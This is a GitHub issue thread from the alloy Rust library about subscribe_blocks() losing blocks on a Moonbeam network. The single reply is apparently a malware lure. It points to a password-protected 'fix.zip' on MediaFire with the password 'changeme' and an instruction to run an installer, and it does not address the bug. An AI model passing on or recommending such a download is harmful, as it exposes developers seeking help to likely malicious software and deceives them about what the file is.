### ISSUE TITLE
[Bug] alloy subscribe_blocks() to moonbean blockchain

### ISSUE THREAD

**Issue by HowHsu** [alloy-rs/alloy#1191]
### Component

provider, pubsub

### What version of Alloy are you on?

Latest

### Operating System

Linux

### Describe the bug

I use alloy to subscribe_blocks() to a moonbean blockchain, but my program doesn't hear anything, while I can use golang and nodejs to subscribe to this blockchain, and it hears blocks.
Sometimes it actually can get some blocks, but after a while it stucks there and no more blocks.
Looks like it is banned by the rpc server, but golang code works well...

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
